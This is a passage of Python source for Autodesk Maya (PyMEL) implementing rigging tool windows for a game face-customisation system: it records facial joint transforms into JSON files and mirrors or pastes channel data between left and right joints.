"controllerBoneNameWidget%s" % index, e=True,
text=dict_data[controller_key][index]["ControllerBoneName"])
offset_value = dict_data[
controller_key][index]["ControllerPositionOffset"]
pm.floatFieldGrp(
"controllerBoneOffsetWidget%s" % index,
e=True,
value1=offset_value[0],
value2=offset_value[1],
value3=offset_value[2])
pm.textFieldGrp(
"controller%sAxisX" % index, e=True,
text=dict_data[controller_key][index]["AxisControl"]["XAxis"])
pm.textFieldGrp(
"controller%sAxisY" % index, e=True,
text=dict_data[controller_key][index]["AxisControl"]["YAxis"])
pm.textFieldGrp(
"controller%sAxisZ" % index, e=True,
text=dict_data[controller_key][index]["AxisControl"]["ZAxis"])
def add_module(self):
u"""
添加模块
模块实际上是一个文件夹。
每当新建一个模块,程序会在文件夹下面创建两个JSON文件。分别为控制器文件和控制器的细节信息文件。
例如:
模块名 Face
控制器文件 FaceController.json
细节文件 FaceControlGroup.json
:return: True
"""
# 文件模式
file_path = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3,
okc=u"设置模块路径")
folder_name = file_path[0].split("/")[len(file_path[0].split("/")) - 1]
# 将新添加的模块添加到菜单项
pm.menuItem(label=folder_name, parent="faceModuleOptionsWidget|OptionMenu")
controller_path = "%s/%sController.json" % (file_path[0], folder_name)
dict_data = {}
controller_key = "%sController" % folder_name
dict_data[controller_key] = []
common.write_json(dict_data=dict_data, file_path=controller_path)
control_group_path = "%s/%sControlGroup.json" % (file_path[0], folder_name)
common.write_json(dict_data={}, file_path=control_group_path)
# 将菜单栏的当前选择修改为新添加的模块
pm.optionMenuGrp("faceModuleOptionsWidget", e=True, value=folder_name)
return True
def add_controller(self):
controller_index = pm.scrollLayout("controllerListLayout", q=True, nch=True)
self.controller[controller_index] = ("controllerGrp%s" % controller_index)
self.add_controller_widget(index=controller_index, parent="controllerListLayout")
def add_controller_widget(self, index=0, parent=""):
if pm.columnLayout("controllerListItemLayout%s" % index, q=True, ex=True):
pm.deleteUI("controllerListItemLayout%s" % index)
layout = pm.columnLayout("controllerListItemLayout%s" % index, adj=1, parent=parent)
pm.textFieldButtonGrp("controllerNameWidget%s" % index,
label=u"控制器名", cw3=[60, 200, 140], bl=u"指定",
bc=lambda *args: self.get_custom_controller(index))
pm.textFieldButtonGrp("controllerGrpNameWidget%s" % index,
label=u"控制器组", cw3=[60, 200, 140], bl=u"指定")
pm.textFieldButtonGrp(
"controllerBoneNameWidget%s" % index, label=u"挂点名称", cw3=[60, 200, 140], bl=u"指定",
bc=lambda *args: self.get_sample_node(text_widget="controllerBoneNameWidget%s" % index))
pm.floatFieldGrp("controllerBoneOffsetWidget%s" % index,
numberOfFields=3, pre=3, label=u'挂点偏移', cw4=[60, 50, 50, 50])
pm.textFieldGrp("controller%sAxisX" % index, label=u"XAxis", cw2=[60, 200])
pm.textFieldGrp("controller%sAxisY" % index, label=u"YAxis", cw2=[60, 200])
pm.textFieldGrp("controller%sAxisZ" % index, label=u"ZAxis", cw2=[60, 200])
pm.separator(style='in', height=20)
pm.setParent("..") # end of layout
return layout
def add_control_detail_widget(self):
parent = "controllerDetailListLayout"
for index in range(0, pm.scrollLayout("controllerListLayout", q=True, nch=True)):
if pm.frameLayout("controllerDetailListItemLayout%s" % index, q=True, ex=True):
pm.deleteUI("controllerDetailListItemLayout%s" % index)
pm.frameLayout("controllerDetailListItemLayout%s" % index,
bgs=True, mw=10, mh=5, cll=True, cl=False, parent=parent)
pm.textFieldButtonGrp("controllerDetailControlType%s" % index,
label=u"控制类型", bl=u"指定", cw3=[48, 200, 140])
pm.textFieldButtonGrp("controllerDetailControlGroup%s" % index,
label=u"控制器组", bl=u"指定", cw3=[48, 200, 140])
pm.text(label=u"滑竿控制", al="left", width=100)
pm.text(label="SliderX:", al="left")
pm.textScrollList("controllerDetailSliderXBone%s" % index)
pm.text(label="SliderY:", al="left")
pm.textScrollList("controllerDetailSliderYBone%s" % index)
pm.text(label="SliderZ:", al="left")
pm.textScrollList("controllerDetailSliderZBone%s" % index)
pm.setParent("..")
# 自动录入一些数据
frame_label = pm.textFieldButtonGrp("controllerNameWidget%s" % index, q=True, text=True)
pm.frameLayout("controllerDetailListItemLayout%s" % index, e=True, label=frame_label)
control_type = pm.optionMenuGrp("faceModuleOptionsWidget", q=True, value=True)
pm.textFieldButtonGrp("controllerDetailControlType%s" % index, e=True, text=control_type)
control_grp = pm.textFieldButtonGrp("controllerGrpNameWidget%s" % index, q=True, text=True)
pm.textFieldButtonGrp("controllerDetailControlGroup%s" % index, e=True, text=control_grp)
control_name = pm.textFieldButtonGrp("controllerNameWidget%s" % index, q=True, text=True)
axis_x = pm.textFieldGrp("controller%sAxisX" % index, q=True, text=True)
if axis_x != "" and axis_x is not None:
definition_joints = pm.PyNode(control_name).attr("jointsX").get()
pm.textScrollList("controllerDetailSliderXBone%s" % index, e=True, a=str_to_list(definition_joints))
axis_y = pm.textFieldGrp("controller%sAxisY" % index, q=True, text=True)
if axis_y != "" and axis_y is not None:
definition_joints = pm.PyNode(control_name).attr("jointsY").get()
pm.textScrollList("controllerDetailSliderYBone%s" % index, e=True, a=str_to_list(definition_joints))
axis_z = pm.textFieldGrp("controller%sAxisZ" % index, q=True, text=True)
if axis_z != "" and axis_z is not None:
definition_joints = pm.PyNode(control_name).attr("jointsZ").get()
pm.textScrollList("controllerDetailSliderZBone%s" % index, e=True, a=str_to_list(definition_joints))
return
def get_sample_node(self, text_widget):
"""
获取样本节点
:param text_widget: 保存样本节点的文本输入框的名字
:return: 样本节点的名字(字符串)
"""
source_sample = pm.ls(sl=True)[0]
pm.textFieldButtonGrp(text_widget, e=True, text=source_sample)
return source_sample
def get_custom_controller(self, index):
custom_controller = self.get_sample_node(
text_widget="controllerNameWidget%s" % index)
# print custom_controller
if "sliderX" in pm.listAttr(custom_controller, k=True):
pm.textFieldButtonGrp("")
pm.textFieldGrp(
"controller%sAxisX" % index, e=True, text="sliderX")
if "sliderY" in pm.listAttr(custom_controller, k=True):
pm.textFieldGrp(
"controller%sAxisY" % index, e=True, text="sliderY")
if "sliderZ" in pm.listAttr(custom_controller, k=True):
pm.textFieldGrp(
"controller%sAxisZ" % index, e=True, text="sliderZ")
return
def generate_custom_data(self):
dict_data = {}
self.dict_data = list()
for index in range(0, pm.scrollLayout(
"controllerListLayout", q=True, nch=True)):
dict_data = {}
axis_control = {}
dict_data["controllerName"] = pm.textFieldButtonGrp(
"controllerNameWidget%s" % index, q=True, text=True)
dict_data["ControllerGroupName"] = pm.textFieldButtonGrp(
"controllerGrpNameWidget%s" % index, q=True, text=True)
dict_data["ControllerBoneName"] = pm.textFieldButtonGrp(
"controllerBoneNameWidget%s" % index, q=True, text=True)
dict_data["ControllerPositionOffset"] = pm.floatFieldGrp(
"controllerBoneOffsetWidget%s" % index, q=True, value=True)
axis_control["XAxis"] = pm.textFieldGrp(
"controller%sAxisX" % index, q=True, text=True)
axis_control["YAxis"] = pm.textFieldGrp(
"controller%sAxisY" % index, q=True, text=True)
axis_control["ZAxis"] = pm.textFieldGrp(
"controller%sAxisZ" % index, q=True, text=True)
dict_data["AxisControl"] = axis_control
self.dict_data.append(dict_data)
def joint_cb_list(self, jnt, pre=5):
"""
骨骼在通道里面的值
列取骨骼在通道栏里面的属性及当前的值,数值小数点后保留5位,
其中位移属性的值需要缩小100倍,也就是乘以0.01,
这是为了解决FBX文件在MAYA,U3D这两个软件内比例单位的差异化造成的错误
:param jnt: 目标骨骼的名称
:param pre: 小数点后面保留几位
:return
"""
jnt_value = [
round(pm.PyNode(jnt).translateX.get() * 0.01, pre),
round(pm.PyNode(jnt).translateY.get() * 0.01, pre),
round(pm.PyNode(jnt).translateZ.get() * 0.01, pre),
round(pm.PyNode(jnt).rotateX.get(), pre),
round(pm.PyNode(jnt).rotateY.get(), pre),
round(pm.PyNode(jnt).rotateZ.get(), pre),
round(pm.PyNode(jnt).scaleX.get(), pre),
round(pm.PyNode(jnt).scaleY.get(), pre),
round(pm.PyNode(jnt).scaleZ.get(), pre),
]
return jnt_value
def generate_custom_detail_data(self):
"""
生成自定义捏脸的细节数据
细节包括各个空间包含的骨骼的位移信息
:return:
"""
dict_data = {}
self.detail_data = {}
# print("Detail item : %s" % pm.scrollLayout(
# "controllerDetailListLayout", q=True, nch=True))
for index in range(0, pm.scrollLayout("controllerDetailListLayout", q=True, nch=True)):
# dict_data = {}
key_name = pm.frameLayout("controllerDetailListItemLayout%s" % index,
q=True, label=True)
dict_data[key_name] = {}
dict_data[key_name]["shapeType"] = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
dict_data[key_name]["GroupName"] = pm.textFieldButtonGrp(
"controllerDetailControlGroup%s" % index, q=True, text=True)
dict_data[key_name]["ControlGroup"] = []
axis_x = dict()
axis_x["GroupName"] = "%s_X" % key_name
axis_x["BoneRange"] = []
for jnt in pm.textScrollList("controllerDetailSliderXBone%s" % index, q=True, ai=True):
jnt_dict = dict()
jnt_dict["BoneName"] = jnt
jnt_dict["Max"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), 1)
jnt_dict["Max"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), 0)
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), -1)
jnt_dict["Min"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), 0)
axis_x["BoneRange"].append(jnt_dict)
dict_data[key_name]["ControlGroup"].append(axis_x)
axis_y = dict()
axis_y["GroupName"] = "%s_Y" % key_name
axis_y["BoneRange"] = []
for jnt in pm.textScrollList("controllerDetailSliderYBone%s" % index, q=True, ai=True):
jnt_dict = dict()
jnt_dict["BoneName"] = jnt
jnt_dict["Max"] = []
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), 1)
jnt_dict["Max"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), 0)
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), -1)
jnt_dict["Min"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), 0)
axis_y["BoneRange"].append(jnt_dict)
dict_data[key_name]["ControlGroup"].append(axis_y)
axis_z = dict()
axis_z["GroupName"] = "%s_Z" % key_name
axis_z["BoneRange"] = []
for jnt in pm.textScrollList("controllerDetailSliderZBone%s" % index, q=True, ai=True):
jnt_dict = dict()
jnt_dict["BoneName"] = jnt
jnt_dict["Max"] = []
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), 1)
jnt_dict["Max"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), 0)
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), -1)
jnt_dict["Min"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), 0)
axis_z["BoneRange"].append(jnt_dict)
dict_data[key_name]["ControlGroup"].append(axis_z)
self.detail_data = dict_data
return
def save_custom_data(self):
"""
保存自定义捏脸数据
:return: None
"""
menu_item_selected = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
self.generate_custom_data()
control_file_path = "%s/%s/%sController.json" % (
self.json_folder, menu_item_selected, menu_item_selected)
controller_data = dict()
controller_data["%sController" % menu_item_selected] = self.dict_data
with open(control_file_path, "w") as f:
json.dump(controller_data, f, indent=4)
self.generate_custom_detail_data()
detail_file_path = "%s/%s/%sControlGroup.json" % (
self.json_folder, menu_item_selected, menu_item_selected)
with open(detail_file_path, "w") as f:
json.dump(self.detail_data, f, indent=4)
print(u"保存成功")
return
def widget_discard_slider(self, ID_name="ID1", ID_num=12):
for ID_index in range(1, ID_num + 1):
pm.floatSliderGrp(
"slider_%s_%s" % (ID_name, ID_index),
label=u"%s.%s" % (ID_name, ID_index),
field=True,
minValue=0,
maxValue=1.0,
fieldMinValue=0,
fieldMaxValue=1.0,
pre=3,
adj=3,
value=0,
cw3=[60, 60, 100])
pm.connectControl(
"slider_%s_%s" % (ID_name, ID_index),
'%s_%s.sliderX' % (ID_name, ID_index))
return
def child_brow_tab(self):
layout = pm.columnLayout(adj=1, rs=5)
pm.rowColumnLayout(numberOfColumns=2)
self.widget_discard_slider(ID_name="ID5", ID_num=12)
pm.setParent('..')
self.brow_discard_path_field = pm.textFieldButtonGrp(
label=u"存放路径",
bl=u"指定路径",
adj=2,
text=self.brow_file_folder,
cw3=[60, 200, 100],
bc=lambda *args: self.setting_brow_file_folder())
pm.setParent('..')
return layout
def setting_brow_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.brow_discard_path_field,
e=True,
text=json_folder[0])
self.brow_file_folder = json_folder[0]
return
def child_eye_tab(self):
layout = pm.columnLayout(adj=1)
pm.rowColumnLayout(numberOfColumns=2)
self.widget_discard_slider(ID_name="ID1", ID_num=16)
pm.setParent('..')
self.eye_discard_path_field = pm.textFieldButtonGrp(
label=u"存放路径",
bl=u"创建Json文件",
adj=2,
text=self.eye_file_folder,
cw3=[60, 200, 100],
bc=lambda *args: self.setting_eye_file_folder())
pm.setParent('..')
return layout
def setting_eye_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.eye_discard_path_field,
e=True,
text=json_folder[0])
self.eye_file_folder = json_folder[0]
return
def child_nose_tab(self):
layout = pm.columnLayout(adj=1)
pm.rowColumnLayout(numberOfColumns=2)
self.widget_discard_slider(ID_name="ID2", ID_num=14)
pm.setParent('..')
self.nose_discard_path_field = pm.textFieldButtonGrp(
label=u"存放路径",
bl=u"创建Json文件",
adj=2,
text=self.nose_file_folder,
cw3=[60, 200, 100],
bc=lambda *args: self.setting_nose_file_folder())
pm.setParent('..')
return layout
def setting_nose_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.nose_discard_path_field,
e=True,
text=json_folder[0])
self.nose_file_folder = json_folder[0]
return
def child_mouth_tab(self):
layout = pm.columnLayout(adj=1)
pm.rowColumnLayout(numberOfColumns=2)
self.widget_discard_slider(ID_name="ID3", ID_num=18)
pm.setParent('..')
self.mouth_discard_path_field = pm.textFieldButtonGrp(
label=u"存放路径",
bl=u"创建Json文件",
adj=2,
text=self.mouth_file_folder,
cw3=[60, 200, 100],
bc=lambda *args: self.setting_mouth_file_folder())
pm.setParent('..')
return layout
def setting_mouth_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.mouth_discard_path_field,
e=True,
text=json_folder[0])
self.mouth_file_folder = json_folder[0]
return
def child_face_tab(self):
layout = pm.columnLayout(adj=1)
pm.rowColumnLayout(numberOfColumns=2)
self.widget_discard_slider(ID_name="ID4", ID_num=14)
pm.setParent('..')
self.face_discard_path_field = pm.textFieldButtonGrp(
label=u"存放路径",
bl=u"创建Json文件",
adj=2,
text=self.face_file_folder,
cw3=[60, 200, 100],
bc=lambda *args: self.setting_face_file_folder())
pm.setParent('..')
return layout
def setting_face_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.face_discard_path_field,
e=True,
text=json_folder[0])
self.face_file_folder = json_folder[0]
return
def save_brow_data_to_json(self):
jnt_list = [
"definition_M_brow",
"definition_L_brow_1",
"definition_L_brow_2",
"definition_L_brow_3",
"definition_L_brow_4",
"definition_L_brow_5",
"definition_R_brow_1",
"definition_R_brow_2",
"definition_R_brow_3",
"definition_R_brow_4",
"definition_R_brow_5",
]
dict_data = {}
module_id = pm.intFieldGrp(
self.module_id_field, q=True, value=True)[0]
dict_data['ID'] = module_id
dict_data['BoneRange'] = {}
for jnt in jnt_list:
dict_data['BoneRange'][jnt] = self.joint_cb_list(jnt=jnt)
file_path = "%s/%s.json" % (self.brow_file_folder, module_id)
with open(file_path, "w") as f:
json.dump(dict_data, f, indent=2)
print(u"Brow通道:%s 数据保存成功!" % module_id)
return
def save_eye_data_to_json(self):
jnt_list = [
"L_eyeBall_socket",
"R_eyeBall_socket",
"definition_facial_L_TLidInn",
"definition_facial_L_TLidMid",
"definition_facial_L_TLidOut",
"definition_facial_L_BLidInn",
"definition_facial_L_BLidMid",
"definition_facial_L_BLidOut",
"definition_facial_R_TLidOut",
"definition_facial_R_TLidMid",
"definition_facial_R_TLidInn",
'definition_facial_R_BLidInn',
"definition_facial_R_BLidMid",
"definition_facial_R_BLidOut",
]
dict_data = {}
module_id = pm.intFieldGrp(
self.module_id_field, q=True, value=True)[0]
dict_data['ID'] = module_id
dict_data['BoneRange'] = {}
for jnt in jnt_list:
dict_data['BoneRange'][jnt] = self.joint_cb_list(jnt=jnt)
file_path = "%s/%s.json" % (self.eye_file_folder, module_id)
with open(file_path, "w") as f:
json.dump(dict_data, f, indent=2)
print(u"Eye通道:%s 数据保存成功!" % module_id)
return
def save_nose_data_to_json(self):
jnt_list = [
"L_eyeBall_socket",
"R_eyeBall_socket",
"definition_facial_C_NoseTip",
"definition_facial_R_Nostril",
"definition_facial_L_Nostril",
"definition_facial_R_NoseBase",
"definition_facial_L_NoseBase",
"facial_C_Nose_JNT",
"definition_facial_C_NoseBridge",
]
dict_data = {}
module_id = pm.intFieldGrp(
self.module_id_field, q=True, value=True)[0]
dict_data['ID'] = module_id
dict_data['BoneRange'] = {}
for jnt in jnt_list:
dict_data['BoneRange'][jnt] = self.joint_cb_list(jnt=jnt)
file_path = "%s/%s.json" % (self.nose_file_folder, module_id)
with open(file_path, "w") as f:
json.dump(dict_data, f, indent=2)
print(u"Nose通道:%s 数据保存成功!" % module_id)
return
def save_mouth_data_to_json(self):
jnt_list = [u'definition_L_LowLipInn_mid',
u'definition_L_LowLipInn_inner',
u'definition_L_LowLipInn_outer',
u'definition_Mouth_L_LowLipInn',
u'definition_L_LowLipMid_mid',
u'definition_L_LowLipMid_inner',
u'definition_L_LowLipMid_outer',
u'definition_L_LowLipOut_mid',
u'definition_L_LowLipOut_inner',
u'definition_L_LowLipOut_outer',
u'definition_Mouth_L_LowLipOut',
u'Mouth_C_All_JNT',
u'definition_Mouth_L_UpLipInn',
u'definition_L_UpLipInn_outer',
u'definition_L_UpLipInn_inner',
u'definition_L_UpLipInn_mid',
u'definition_Mouth_L_UpLipMid',
u'definition_L_UpLipMid_outer',
u'definition_L_UpLipMid_inner',
u'definition_L_UpLipMid_mid',
u'definition_Mouth_L_UpLipOut',
u'definition_L_UpLipOut_outer',
u'definition_L_UpLipOut_inner',
u'definition_L_UpLipOut_mid',
u'definition_Mouth_L_Corner',
u'definition_Mouth_C_UpLip',
u'definition_C_UpLip_outer',
u'definition_C_UpLip_inner',
u'definition_C_UpLip_mid',
u'definition_Mouth_C_LowLip',
u'definition_C_LowLip_outer',
u'definition_C_LowLip_inner',
u'definition_C_LowLip_mid',
u'definition_Mouth_R_UpLipMid',
u'definition_R_UpLipMid_outer',
u'definition_R_UpLipMid_inner',
u'definition_R_UpLipMid_mid',
u'definition_Mouth_R_UpLipInn',
u'definition_R_UpLipInn_outer',
u'definition_R_UpLipInn_inner',
u'definition_R_UpLipInn_mid',
u'definition_Mouth_R_UpLipOut',
u'definition_R_UpLipOut_outer',
u'definition_R_UpLipOut_inner',
u'definition_R_UpLipOut_mid',
u'definition_Mouth_R_Corner',
u'definition_Mouth_R_LowLipOut',
u'definition_R_LowLipOut_outer',
u'definition_R_LowLipOut_inner',
u'definition_R_LowLipOut_mid',
u'definition_R_LowLipMid_mid',
u'definition_R_LowLipMid_inner',
u'definition_R_LowLipMid_outer',
u'definition_Mouth_R_LowLipMid',
u'definition_R_LowLipInn_mid',
u'definition_R_LowLipInn_inner',
u'definition_R_LowLipInn_outer',
u'definition_Mouth_R_LowLipInn',
u'definition_Mouth_L_LowLipMid']
dict_data = {}
module_id = pm.intFieldGrp(
self.module_id_field, q=True, value=True)[0]
dict_data['ID'] = module_id
dict_data['BoneRange'] = {}
for jnt in jnt_list:
dict_data['BoneRange'][jnt] = self.joint_cb_list(jnt=jnt)
file_path = "%s/%s.json" % (self.mouth_file_folder, module_id)
with open(file_path, "w") as f:
json.dump(dict_data, f, indent=2)
print(u"Mouth通道:%s 数据保存成功!" % module_id)
return
def save_data_to_json(self):
tab_array = ['brow', 'eye', 'nose', 'mouth', 'face']
current_tab_index = pm.tabLayout(
self.discard_child_tab_layout,
q=True,
sti=True) - 1
# print(tab_array[current_tab_index])
if tab_array[current_tab_index] == 'brow':
self.save_brow_data_to_json()
if tab_array[current_tab_index] == 'eye':
self.save_eye_data_to_json()
if tab_array[current_tab_index] == 'nose':
self.save_nose_data_to_json()
if tab_array[current_tab_index] == 'mouth':
self.save_mouth_data_to_json()
if tab_array[current_tab_index] == 'face':
pass
return
def join_list_item(list_data):
output_str = ""
for item in list_data:
print(item)
output_str = output_str + ":" + item
print(output_str)
return output_str
class DataPasteHelper(common.Singleton):
def __init__(self):
super(DataPasteHelper, self).__init__()
self.expression_data = {}
self.joint_number = 0
self.target_list = []
self.show()
def show(self):
if pm.window("ExpressionHelper", ex=True):
pm.deleteUI("ExpressionHelper")
pm.window("ExpressionHelper", t=u"数据粘贴助手", mb=True)
form_layout = pm.formLayout()
column_layout = pm.columnLayout(adj=1, rs=2)
self.work_mode_control = pm.radioButtonGrp(
p=column_layout,
label=u"工作模式:",
labelArray3=[u'镜像', u'翻转', u'粘贴'],
numberOfRadioButtons=3,
cw4=[60, 60, 60, 60],
sl=1)
pm.frameLayout(p=column_layout, label=u"约束轴", mw=5, mh=5, bgs=True)
self.translate_offset_value = pm.checkBoxGrp(
label="Translate:",
numberOfCheckBoxes=3,
labelArray3=['X', 'Y', 'Z'],
va3=[True, False, False],
cw4=[60, 50, 50, 50])
self.rotate_offset_value = pm.checkBoxGrp(
label="Rotate:",
numberOfCheckBoxes=3,
labelArray3=['X', 'Y', 'Z'],
va3=[False, True, True],
cw4=[60, 50, 50, 50])
self.scale_offset_value = pm.checkBoxGrp(
label="Scale:",
numberOfCheckBoxes=3,
labelArray3=['X', 'Y', 'Z'],
va3=[False, False, False],
cw4=[60, 50, 50, 50])
pm.setParent("..")
self.label_control = pm.text(
p=column_layout, label=u"搜索和替换选项:", al="left")
self.search_field_control = pm.textFieldGrp(
p=column_layout, label=u"搜索:", cw2=[60, 240], text="_L_")
self.replace_field_control = pm.textFieldGrp(
p=column_layout, label=u"替换:", cw2=[60, 240], text="_R_")
self.task_info_control = pm.text(
p=column_layout,
label=u"已经复制%s个对象的通道栏数据" % self.joint_number,
w=300,
al="left")
pm.setParent(column_layout)
self.copy_button = pm.button(
p=form_layout,
label=u"复制数据", w=80, c=lambda *args: self.copy_expression())
self.select_source_button = pm.button(
p=form_layout,
label=u"选择来源",
w=80, c=lambda *args: self.select_source_object())
self.select_target_button = pm.button(
p=form_layout,
label=u"选择目标",
w=80, c=lambda *args: self.select_target_object())
self.paste_button = pm.button(
p=form_layout,
label=u"拷贝数据", w=80, c=lambda *args: self.paste_expression())
pm.formLayout(
form_layout, edit=True,
attachForm=[
(column_layout, "top", 10),
(column_layout, "left", 10),
(column_layout, "right", 10),
(self.copy_button, 'left', 10),
(self.copy_button, 'bottom', 10),
(self.select_source_button, 'bottom', 10),
(self.select_target_button, 'bottom', 10),
(self.paste_button, 'bottom', 10),
(self.paste_button, 'right', 10),
],
attachControl=[
(column_layout, 'bottom', 10, self.copy_button),
(self.select_source_button, 'left', 10, self.copy_button),
(self.select_target_button, 'left', 10,
self.select_source_button),
(self.paste_button, 'left', 10, self.select_target_button),
])
pm.showWindow("ExpressionHelper")
def copy_expression(self):
self.expression_data = {}
sel_joints = pm.ls(sl=True)
for jnt in sel_joints:
self.expression_data[jnt.shortName()] = [
round(pm.PyNode(jnt).translateX.get(), 5),
round(pm.PyNode(jnt).translateY.get(), 5),
round(pm.PyNode(jnt).translateZ.get(), 5),
round(pm.PyNode(jnt).rotateX.get(), 5),
round(pm.PyNode(jnt).rotateY.get(), 5),
round(pm.PyNode(jnt).rotateZ.get(), 5),
round(pm.PyNode(jnt).scaleX.get(), 5),
round(pm.PyNode(jnt).scaleY.get(), 5),
round(pm.PyNode(jnt).scaleZ.get(), 5),
]
self.joint_number = len(sel_joints)
pm.text(self.task_info_control,
e=True,
label=u"已经复制%s根骨骼的信息" % self.joint_number)
return True
def select_source_object(self):
source_objects = self.expression_data.keys()
pm.select(source_objects)
return
def select_target_object(self):
target_objects = self.target_list
pm.select(target_objects)
return
def convert_check_list(self, check_list=[]):
new_list = [1, 1, 1]
if check_list[0]:
new_list[0] = -1
else:
new_list[0] = 1
if check_list[1]:
new_list[1] = -1
else:
new_list[1] = 1
if check_list[2]:
new_list[2] = -1
else:
new_list[2] = 1
return new_list
def paste_expression(self):
work_mode_list = ['mirror', 'flip', 'paste']
current_mode_index = pm.radioButtonGrp(
self.work_mode_control, q=True, sl=True)
work_mode = work_mode_list[current_mode_index - 1]
translate_offset_value = self.convert_check_list(
pm.checkBoxGrp(self.translate_offset_value, q=True, va3=True))
rotate_offset_value = self.convert_check_list(
pm.checkBoxGrp(self.rotate_offset_value, q=True, va3=True))
scale_offset_value = self.convert_check_list(
pm.checkBoxGrp(self.scale_offset_value, q=True, va3=True))
self.target_list = []
for jnt in self.expression_data.keys():
search_field = pm.textFieldGrp(
self.search_field_control, q=True, text=True)
replace_field = pm.textFieldGrp(
self.replace_field_control, q=True, text=True)
target_jnt = jnt.replace(search_field, replace_field)
self.target_list.append(target_jnt)
value = self.expression_data[jnt]
if work_mode == 'mirror':
new_value = [
value[0] * translate_offset_value[0],
value[1] * translate_offset_value[1],
value[2] * translate_offset_value[2],
value[3] * rotate_offset_value[0],
value[4] * rotate_offset_value[1],
value[5] * rotate_offset_value[2],
value[6] * scale_offset_value[0],
value[7] * scale_offset_value[1],
value[8] * scale_offset_value[2]
]
pm.PyNode(target_jnt).translate.set(
[new_value[0], new_value[1], new_value[2]])
pm.PyNode(target_jnt).rotate.set(
[new_value[3], new_value[4], new_value[5]])
pm.PyNode(target_jnt).scale.set(
[new_value[6], new_value[7], new_value[8]])
else:
pass
return True
class DataHelper(common.Singleton):
def __init__(self):
super(DataHelper, self).__init__()
self.show()
def sdk_layout(self, parent):
layout = pm.frameLayout(
p=parent, label="SDK Mirror Helper", bgs=True, mw=10, mh=10)
pm.textFieldGrp(label="Search", cw2=[80, 150])
pm.textFieldGrp(label="Replace", cw2=[80, 150])
pm.setParent(layout)
return layout
def show(self):
if pm.window("xdDataHelperWnd", ex=True):
pm.deleteUI("xdDataHelperWnd")
pm.window(
"xdDataHelperWnd",
t=u"数据镜像操作助手",
mb=True)
form_layout = pm.formLayout()
work_mode_layout = pm.rowColumnLayout(nr=1, p=form_layout)
pm.text(label=u"工作模式:")
collection1 = pm.radioCollection()
rb1 = pm.radioButton(label='SDK')
rb2 = pm.radioButton(label='Attribute')
pm.setParent('..')
pm.setParent(work_mode_layout)
container_layout = pm.columnLayout(adj=1, p=form_layout)
self.sdk_layout(parent=container_layout)
pm.setParent(container_layout)
mirror_btn = pm.button(label="Mirror", p=form_layout)
# column_layout = pm.columnLayout(adj=1, rs=2)
# self.work_mode_control = pm.radioButtonGrp(
# p=column_layout,
# label=u"工作模式:",
# labelArray3=[u'镜像', u'翻转', u'粘贴'],
# numberOfRadioButtons=3,
# cw4=[60, 60, 60, 60],
# sl=1)
# pm.frameLayout(p=column_layout, label=u"约束轴", mw=5, mh=5, bgs=True)
# self.translate_offset_value = pm.checkBoxGrp(
# label="Translate:",
# numberOfCheckBoxes=3,
# labelArray3=['X', 'Y', 'Z'],
# va3=[True, False, False],
# cw4=[60, 50, 50, 50])
# self.rotate_offset_value = pm.checkBoxGrp(
# label="Rotate:",
# numberOfCheckBoxes=3,
# labelArray3=['X', 'Y', 'Z'],
# va3=[False, True, True],
# cw4=[60, 50, 50, 50])
# self.scale_offset_value = pm.checkBoxGrp(
# label="Scale:",
# numberOfCheckBoxes=3,
# labelArray3=['X', 'Y', 'Z'],
# va3=[False, False, False],
# cw4=[60, 50, 50, 50])
# pm.setParent("..")
# self.label_control = pm.text(
# p=column_layout, label=u"搜索和替换选项:", al="left")
# self.search_field_control = pm.textFieldGrp(
# p=column_layout, label=u"搜索:", cw2=[60, 240], text="_L_")
# self.replace_field_control = pm.textFieldGrp(
